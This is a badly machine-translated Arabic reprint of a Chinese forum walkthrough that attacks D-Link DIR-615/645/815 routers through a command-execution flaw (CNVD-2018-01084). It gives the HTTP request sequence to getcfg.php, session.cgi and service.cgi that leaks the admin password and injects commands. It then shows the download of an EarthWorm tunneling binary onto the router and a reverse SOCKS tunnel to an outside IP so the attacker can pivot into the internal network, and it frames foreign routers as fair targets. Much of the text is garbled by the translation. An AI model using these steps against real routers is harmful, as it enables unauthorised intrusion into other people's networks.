الاختبار، واستخدام D لينك الموجه عن بعد الضعف تنفيذ الأوامر (CNVD-2018-01084)، سمعت هذا ابن عم كبير اسمه D-لينك، ويعرف فقط لبيع، لا أعرف إصلاح، ومن ناحية مست ذلك لمسة، لذلك خصيصا ليأتي لتشغيله.
تنبيه: جهاز التوجيه للهجوم كما الموجه الأجانب، لا تلمس أي قضايا قانونية المحلية!
أخذنا المنشعب ابن عم اللاعبين الكبار: إطار مشروع علة في رسالة تأكيد الأولي الجهاز الهدف.
STEP 1
نستخدمها لبرنامج الكشف عن توجيه كلمة D لينك، وجهاز اختبار الهدف موجودا دي لينك الموجه عن بعد الضعف تنفيذ الأوامر (RCE).
يمكننا أن نرى أن هناك ضعف الهدف الكشف عن كلمة السر، والهدف هو أيضا من المرجح جدا الوجود RCE.
وحدة .Bpf لاستخدام التعليمات البرمجية التالية:
zbz > 1 / zbz >
bz1 >
dzkz > /getcfg.php / dzkz >
sfjt > بعد / sfjt >
عرض > SERVICES = DEVICE.ACCOUNT / عرض >
البنود > إتصال: المحافظة على الحياة
استعرض ترميز: غزيب، يدحض
قبول: * / *
عامل المستخدم: بيثون طلبات / 2.18.4
نوع المحتوى: التطبيق / x-شبكة الاتصالات العالمية urlencoded شكل؛ محارف = UTF-8
المضيف: المضيف المحلي
كوكي: رمز المستخدم = OwHZilJVQa
المحتوى طول: 23 / البنود >
/ bz1 >
بيسة > النسخة تأثير البرامج الثابتة:
دي لينك DIR 615/645/815 / بيسة >
ثم نقوم اختبار جدوى في ظل RCE.
br0 رابط ENCAP: إيثرنت HWaddr FC: 75: 16: A3: 4D: 8A
إنت ADDR: 192.168.0.1 Bcast: 192.168.0.255 قناع: 255.255.255.0
inet6 ADDR: FE80 :: fe75: 16ff: fea3: 4d8a / 64 النطاق: لينك
UP BROADCAST RUNNING MULTICAST MTU: 1500 متري: 1
الحزم RX: 5242601 الأخطاء: 0 انخفض: 0 تجاوزات: 0 الإطار: 0
الحزم TX: 8813744 الأخطاء: 0 انخفض: 0 تجاوزات: 0 الناقل: 0
اصطدام: 0 txqueuelen: 0
RX بايت: 820199842 (782.2 ميغابايت) TX بايت: 1538717378 (1.4 بنك الخليج الدولي)
BR1 رابط ENCAP: إيثرنت HWaddr 6E: CE: D5: 9F: 11: AF
إنت ADDR: 192.168.1.1 Bcast: 192.168.1.255 قناع: 255.255.255.0
inet6 ADDR: FE80 :: 6cce: d5ff: fe9f: 11af / 64 النطاق: لينك
UP BROADCAST RUNNING MULTICAST MTU: 1500 متري: 1
الحزم RX: 0 أخطاء: 0 انخفض: 0 تجاوزات: 0 الإطار: 0
الحزم TX: 3663 الأخطاء: 0 انخفض: 0 تجاوزات: 0 الناقل: 0
اصطدام: 0 txqueuelen: 0
RX بايت: 0 (0.0 B) TX بايت: 183474 (179.1 كيلوبايت)
نجاح تنفيذ الأمر إفكونفيغ، من المعلومات التي تم إرجاعها، يمكننا أن نرى فرعية حيث الجهاز الهدف، ويمكن الاستدلال على تنفيذ نظام التشغيل الهدف من الأمر، بطبيعة الحال، وهدفنا هو جهاز توجيه، جزءا لا يتجزأ من لينكس لا يتطلب هذا النظام الكثير من التفكير.
كود الوحدة هي كما يلي:
cs1mc > القيادة / cs1mc >
zbz > 3 / zbz >
bz1 >
dzkz > /getcfg.php / dzkz >
sfjt > بعد / sfjt >
عرض > SERVICES = DEVICE.ACCOUNT / عرض >
مركز السيطرة على الأمراض > اسم > المشرف / اسم >
usrid > / usrid >
كلمة المرور > القرص المضغوط > / كلمة المرور > / مركز السيطرة على الأمراض >
البنود > إتصال: المحافظة على الحياة
استعرض ترميز: غزيب، يدحض
قبول: * / *
عامل المستخدم: بيثون طلبات / 2.18.4
نوع المحتوى: التطبيق / x-شبكة الاتصالات العالمية urlencoded شكل؛ محارف = UTF-8
المضيف: المضيف المحلي
كوكي: رمز المستخدم = OwHZilJVQv / البنود >
/ bz1 >
BZ2 >
dzkz > /session.cgi / dzkz >
sfjt > بعد / sfjt >
عرض > ACTION = login_plaintext وPASSWD = القرص المضغوط / > وCAPTCHA = & USER = المشرف وREPORT_METHOD = أكس / عرض >
البنود > إتصال: المحافظة على الحياة
استعرض ترميز: غزيب، يدحض
قبول: * / *
عامل المستخدم: بيثون طلبات / 2.18.4
نوع المحتوى: التطبيق / x-شبكة الاتصالات العالمية urlencoded شكل؛ محارف = UTF-8
المضيف: المضيف المحلي
كوكي: رمز المستخدم = OwHZilJVQv / البنود >
/ BZ2 >
bz3 >
dzkz > /service.cgi / dzkz >
sfjt > بعد / sfjt >
عرض > EVENT = CHECKFW 26 CS1 / > 26 / عرض >
البنود > المضيف: المضيف المحلي
عامل المستخدم: الثعبان urllib / 2.7
إتصال: المحافظة على الحياة
كوكي: رمز المستخدم = OwHZilJVQv
نوع المحتوى: التطبيق / x-شبكة الاتصالات العالمية urlencoded شكل؛ محارف = UTF-8 / البنود >
/ bz3 >
بيسة > النسخة تأثير البرامج الثابتة:
دي لينك DIR 615/645/815 / بيسة >
ومع ذلك، وهدفنا هو ليس هنا، في البداية لاختبار تنفيذ الأمر مجلد مشترك، نقوم بتنفيذ الأمر التالي.
نسخ رمز في عرض نص عادي
؟
1مجلد مشترك -q
العودة إلى الملقم HFS الزيارات الرأي.
التنفيذ الناجح، وبدء التخطيط ليلى الشريرة، مهلا مهلا مهلا.
STEP 2
فتح نشر في إطار مشروع خادم علة، الجوارب التكوين رصد المحلي.
بعد ذلك، الملقم الهدف لزرع على دودة الأرض (دودة الأرض)، وانا ذاهب لوضعها زرعها في الهدف \ تمة \ الدليل.
ليرة سورية /
تحميل هيكل قيادة الصامت:
مجلد مشترك ف / تمة / -q
يمكن أن ينظر إليه ديدان الأرض زرع ناجحة، والكذب / تمة / الدليل.
رفع الامتيازات ديدان الأرض:
التصريح 0777 / تمة / ew_mipsel
النتائج:
-rwxrwxrwx 10 جذر 173604 مارس 3122:05 / تمة / ew_mipsel
امتياز نجاح التصعيد!
الاستمرار في بناء أمر الجوارب انتعاش:
/ تمة / ew_mipsel -s rssocks -d 111.111.111.111 -e 888
بعد تنفيذ نفق الجوارب بنجاح ارتد خلق بنجاح!
STEP 3
نحن تحميل Sockscap64، دفق البيانات الشبكة المحلية للانتقال عبر نفق الجوارب.
نفق فتح بنجاح!
ثم، وشحذ شبكة داخليا.
يا ~~، الماسح الضوئي قد يكون لها بعض المشاكل، وربما أحتاج لاستكشاف الأسباب الكامنة وراء ......
الكاتب: التنين، وأعيد طبعه من: الشبكي: //bbs.ichunqiu.com/forum.php وزارة الدفاع = viewthread والدار = 37051؟
نرحب بكم في مجموعات صغيرة لمناقشة الشراكات: 738569199